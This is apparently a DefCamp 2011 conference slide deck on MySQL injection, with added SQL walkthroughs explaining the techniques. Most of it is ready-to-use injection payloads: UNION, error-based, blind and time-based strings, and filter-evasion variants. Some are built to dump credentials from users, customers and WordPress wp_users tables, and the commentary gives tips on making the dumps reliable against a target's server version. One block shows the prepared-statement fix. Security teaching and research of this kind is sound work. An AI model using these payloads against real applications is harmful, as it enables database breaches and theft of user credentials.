Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables
1. DEFCAMP – 2011 “Advanced Data Mining in MySQL Injections using Subqueries & Custom Variables”
2. - CONTENTS -
[ * ] Introductory notions: SQL, SQL injection
[ * ] Custom (user-defined) variables and subqueries in MySQL
[ * ] Optimizing the classic information-extraction techniques:
 - MySQL variables (Server System Variables / Session Variables)
 - available databases (schema_name / SCHEMATA)
 - tables and their columns (table_name / column_name)
 - privileges (USER_PRIVILEGES: GRANTEE / PRIVILEGE_TYPE / IS_GRANTABLE)
 - reading & writing files (LOAD_FILE / INTO DUMPFILE - OUTFILE)
 - Denial of Service (DoS) attacks
3. Structured Query Language (SQL) is the standard language for manipulating and retrieving data in relational databases. Through SQL a programmer or a database administrator can:
 * modify the structure of a database;
 * change the configuration values that govern the system's security;
 * grant users rights over databases or tables;
 * query a database for information;
 * update the contents of a database.
4. How do PHP + MySQL work together?
 - the request made by the client
 - the request being processed on the server side
 - the response sent back to the client as the result of the request
5. What could possibly go wrong?!
6. SQL Injection – a technique that malforms the SQL syntax of a query by altering the values of $_GET, $_POST, cookie and header parameters, which the server-side code takes over and builds into the query without first filtering dangerous characters or commands (or, better, without binding them as parameters).
7. Example of a classic MySQL injection.
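To make the classic case concrete in MySQL's own terms, here is an added example (not from the slides) that feeds one attacker-controlled value through the two ways a server-side layer can build the query. The `news` table, its rows and the `@input` value are constructed for the demo; server-side PREPARE stands in for the PHP layer, where the real fix is a mysqli/PDO prepared statement with a bound, typed parameter.

```sql
-- Constructed demo table standing in for the application's data.
CREATE TEMPORARY TABLE news (id INT PRIMARY KEY, title VARCHAR(64), body TEXT);
INSERT INTO news VALUES (1, 'Public post', 'visible to everyone'),
                        (2, 'Draft',       'not yet published');

-- The value the client sent as ?id=... (what PHP would see in $_GET['id']).
SET @input := '1 UNION SELECT 1, user(), @@version';

-- 1) Vulnerable: the value is concatenated into the statement text, so the parser
--    reads the attacker's UNION as part of the query.
SET @sql := CONCAT('SELECT id, title, body FROM news WHERE id = ', @input);
PREPARE vuln FROM @sql;
EXECUTE vuln;               -- row 1 of news, plus a second row carrying user() and @@version
DEALLOCATE PREPARE vuln;

-- 2) Fixed: the statement text is constant and the value is bound as a parameter.
--    The whole string is a value compared against id; it never reaches the parser.
PREPARE safe FROM 'SELECT id, title, body FROM news WHERE id = ?';
EXECUTE safe USING @input;  -- only row 1: MySQL converts the numeric prefix '1' (with a
                            -- truncation warning); the UNION text is just characters
DEALLOCATE PREPARE safe;
```

The `and 2=4` / `and false` fragments on the following slides exist to suppress the legitimate row in case 1, so that only the attacker's UNION row comes back.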
8. Types of SQL injection: UNION BASED
index.php?id=1' and 2=4 UNION SELECT 1,2,3,4,5,6,7,8,9,10 --
index.php?poze=vedete"+and+false+union+all+select+1,2,version(),4,5,6+and+"1"="1
index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--
index.php?id=-1/*!AND*/1=1+UNiOn+ALl+SelECt+1,/**/2,/**/3,/**/4/**/limit/**/1,2
index.php?id=1+and+1=0+union+select+sql_no_cache+1,2,3,4,5
9. Types of SQL injection: UNION BASED
10. Types of SQL injection: ERROR BASED
index.php?id=(@:=1)||@+group+by+concat(@@version,!@)having@||min(@:=0)--+
Index.php?id=53+OR+(SELECT+COUNT(*)+FROM+(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CONCAT(MID((select+concat_ws(0x3a,version(),database(),user())),1,63),+FLOOR(RAND(0)*2)))+--+
news.php?id=589'+or+1+group+by+concat((select+version()),floor(rand(0)*2))+having+min(0)+or+1--+
details.php?ID=9 or (select count(*) from mysql.user group by concat(version(),floor(rand(0)*2)))--
?productid=1124+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+3,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a)--
11. Types of SQL injection: ERROR BASED
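An added example (not from the slides) showing why the FLOOR(RAND(0)*2) payloads above produce an error that carries data, written as the bare query against information_schema so it runs on any MySQL test instance. It assumes nothing beyond a connection (database() may be NULL when no schema is selected, which is why it is wrapped in IFNULL).

```sql
-- RAND(0) is seeded, so FLOOR(RAND(0)*2) always yields the sequence 0,1,1,0,1,1,...
-- GROUP BY keeps its groups in a temporary table keyed on the grouped value. For each
-- source row MySQL evaluates the key to look it up; when the key is new it evaluates the
-- expression again to insert it, and the second evaluation can differ from the first:
--   row 1: lookup 0 (missing) -> inserted with the key re-evaluated as 1
--   row 2: lookup 1 (found)   -> count++
--   row 3: lookup 0 (missing) -> insert re-evaluated as 1 -> key already present
-- so with at least three source rows the statement fails with
--   ERROR 1062: Duplicate entry ':<version>:<db>:<user>:1' for key 'group_key'
-- and the error text echoes whatever was concatenated into the key.
SELECT COUNT(*),
       CONCAT(':', @@version, ':', IFNULL(database(), '-'), ':', user(), ':',
              FLOOR(RAND(0)*2)) AS k
FROM information_schema.tables          -- any source with >= 3 rows works as the driver
GROUP BY k;

-- The same primitive aimed at one row of a result set, paging with LIMIT n,1
-- (the slide's "limit 3,1" reads the 4th table name):
SELECT COUNT(*),
       CONCAT(':', (SELECT table_name FROM information_schema.tables LIMIT 3,1), ':',
              FLOOR(RAND(0)*2)) AS k
FROM information_schema.tables
GROUP BY k;
-- The value shown in the error message is truncated, which is why the slide windows
-- the payload with MID(..., 1, 63). The trick depends on how the GROUP BY temporary
-- table is implemented; confirm it against the target's MySQL version before relying on it.
```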
12. Types of SQL injection: BLIND
index.php?id=1' and substring(@@version,1,1)=4--
index.php?id=1' and substring(@@version,1,1)=5--
index.php?id=1 and (SELECT 1 from admin limit 0,1)=1
news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))
index.html?mdl=5020+and+ascii(lower(substring((select+table_name+from+information_schema.tables+limit+17,1),1,1)))>1
index.php?id=1 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>103
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,BENCHMARK(2000000,MD5(NOW())))--
script.php?par=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1))>=100,1,SLEEP(3))--
13. Types of SQL injection: BLIND
14. MySQL Custom Variables (User-Defined Variables)
15. MySQL Sub-Queries (Subqueries)
SELECT * FROM t1 WHERE column1 = (SELECT column1 FROM t2);
16. MySQL injection using Custom Variables:
CLASSIC SYNTAX: index.php?id=2'+and+1=0+union+select+1,2,3,4,5--
NEW SYNTAX: index.php?id=2'+and+1=0+union+select+@i:=version(),@i,@i,@i,@i--
@i:=concat(version(),0x3a,database())
@i:=cast(version()+as+binary)
@i:=convert(version(),binary)
@i:=convert(version()+using+latin1)
@i:=aes_decrypt(aes_encrypt(version(),1),1)
@x:=concat(0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name)
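An added example (not from the slides) of the two MySQL behaviours the "new syntax" payloads rely on: that an assignment is an expression returning the assigned value, and that the CAST/CONVERT wrappers exist to get past UNION collation errors. The `items` and `secrets` tables, their collations and rows are constructed for the demo.

```sql
-- (1) @i := expr returns the assigned value, so one computed value fills every column
--     of a UNION row without retyping it:
SELECT @i := version() AS c1, @i AS c2, @i AS c3, @i AS c4, @i AS c5;
-- The manual leaves the order in which @i is read within one statement undefined and,
-- since 8.0.13, deprecates assignment inside expressions; the left-to-right behaviour
-- observed in practice is what the payloads depend on.

-- (2) UNION merges the collations of the columns it joins; two different *_ci collations
--     of the same character set, both coming from columns, cannot be merged.
CREATE TEMPORARY TABLE items   (id INT, name VARCHAR(32) COLLATE utf8mb4_unicode_ci);
CREATE TEMPORARY TABLE secrets (k VARCHAR(32) COLLATE utf8mb4_general_ci);
INSERT INTO items   VALUES (1, 'widget');
INSERT INTO secrets VALUES ('api-key-1234');

-- Fails with ERROR 1267: Illegal mix of collations (utf8mb4_unicode_ci,IMPLICIT) and
-- (utf8mb4_general_ci,IMPLICIT) for operation 'UNION'
SELECT id, name FROM items WHERE id = 99
UNION SELECT 1, k FROM secrets;

-- Works: a binary string merges with any collation, which is exactly what the slide's
-- @i:=cast(version() as binary) buys; the other wrappers (convert ... using, aes_decrypt(
-- aes_encrypt())) likewise hand the server a value whose type it can merge.
SELECT id, name FROM items WHERE id = 99
UNION SELECT @i := CAST(k AS BINARY), @i FROM secrets;
```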
17. MySQL injection using SubQueries:
index.php?id=-1+union+select+*+from+users,(select+1,2,3,4,5,6)a--
index.php?id=-1+union+(select 1,2,3,4,5 order by 1 where 1=2) UNION (select 1,2,3,4,5)--+--X
id=3 AND (SELECT 7574 FROM(SELECT COUNT(*),CONCAT(CHAR(58,103,104,115,58),(SELECT (CASE WHEN (7574=7574) THEN 1 ELSE 0 END)),CHAR(58,101,118,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
18. MySQL injection using SubQueries + Custom Variables:
index.php?id=-4 union select 1,2,(select(@x) from(select(@x:=0x00),(select (null) from (information_schema.columns) where (table_schema!='information_schema') and (0x00) in (@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4--
index.php?id=-1 Union select 1,2,concat(@i:=0x00,@o:=0x0d0a,benchmark(150,@o:=CONCAT(@o,0x0d0a,(SELECT+concat(@i:=mail,0x3a,password)+from+customers+WHERE+mail>@i+order+by+mail+LIMIT+1))),@o),4
index.php?id=-7' union (select * from (select @i:=version())q join (select @i)w join (select @i)e join (select @i)r join (select @i)t join (select @i)y join (select @i)u join (select @i)i join (select @i)o)--+--qwertyxxxxxxxx
19. MySQL injection using SubQueries + Custom Variables:
index.php?id=2'+and+1=0+union+select+1,2,3,4,concat(@i:=0x00,@o:=0xd0a,benchmark(1010370,@o:=CONCAT(@o,0xd0a,(SELECT+concat(0x3c62723e,@i:=user_login)+FROM+wp_users+WHERE+user_login>@i+order+by+user_login+LIMIT+1))),@o),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables--
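An added example (not from the slides) that writes the two accumulator patterns of slides 18 and 19 in readable form against a constructed `wp_users` table (three rows with hypothetical values), so they can be run on a MySQL test instance. It also guards the failure the raw BENCHMARK payload has when the iteration count exceeds the number of rows.

```sql
-- Constructed target: the WordPress users table the slide's payload reads. The index on
-- user_login lets the ORDER BY ... LIMIT 1 lookup below be served without a sort.
CREATE TEMPORARY TABLE wp_users (
  ID INT PRIMARY KEY,
  user_login VARCHAR(60),
  user_pass  VARCHAR(64),
  KEY (user_login)
);
INSERT INTO wp_users VALUES (1, 'admin', 'hash1'), (2, 'bob', 'hash2'), (3, 'carol', 'hash3');

-- Pattern 1 (slide 18, first payload): fold every row into one variable in a single pass.
-- CONCAT evaluates its arguments left to right: @x is reset, then the scalar subquery
-- scans the table; its WHERE is false for every row ('' never equals the concatenation)
-- but the assignment inside it runs once per row, and the last argument returns the total.
-- COUNT(*) keeps the subquery from returning NULL, which would blank the whole CONCAT.
SELECT CONCAT(
         @x := '',
         (SELECT COUNT(*) FROM wp_users
           WHERE '' IN (@x := CONCAT(@x, '<br>', user_login, ':', user_pass))),
         @x) AS dump;
-- -> '3<br>admin:hash1<br>bob:hash2<br>carol:hash3'  (the leading digit is the COUNT)
-- GROUP_CONCAT does the same job when it is not filtered and group_concat_max_len
-- (default 1024) is large enough; this form has no such length limit.

-- Pattern 2 (slide 18, second payload; slide 19): BENCHMARK as a loop.
-- BENCHMARK(n, expr) evaluates expr n times and returns 0. Each evaluation fetches the
-- smallest user_login greater than @i, appends it to @o and advances @i, walking the
-- table in order. Because the subquery reads a user variable that the same statement
-- assigns, MySQL re-executes it on every iteration instead of caching the first result.
-- Guard: once the rows are exhausted the subquery yields NULL; the raw payload then turns
-- @o into NULL and loses everything, so its n had to match the row count exactly.
-- IFNULL makes an oversized n harmless.
SELECT CONCAT(
         @i := '', @o := '',
         BENCHMARK(10, @o := CONCAT(@o, IFNULL(CONCAT('\n',
             (SELECT CONCAT(@i := user_login, ':', user_pass)
                FROM wp_users
               WHERE user_login > @i
               ORDER BY user_login
               LIMIT 1)), ''))),
         @o) AS dump;
-- -> '0\nadmin:hash1\nbob:hash2\ncarol:hash3'  (the leading 0 is BENCHMARK's return value)
```

Both forms rely on evaluation order that the MySQL manual documents as undefined for user variables, and MySQL 8.0.13+ flags the `@var :=` assignments as deprecated; they work on the 5.x servers the slides target, but verify each on the version in front of you rather than assuming the accumulated string is complete.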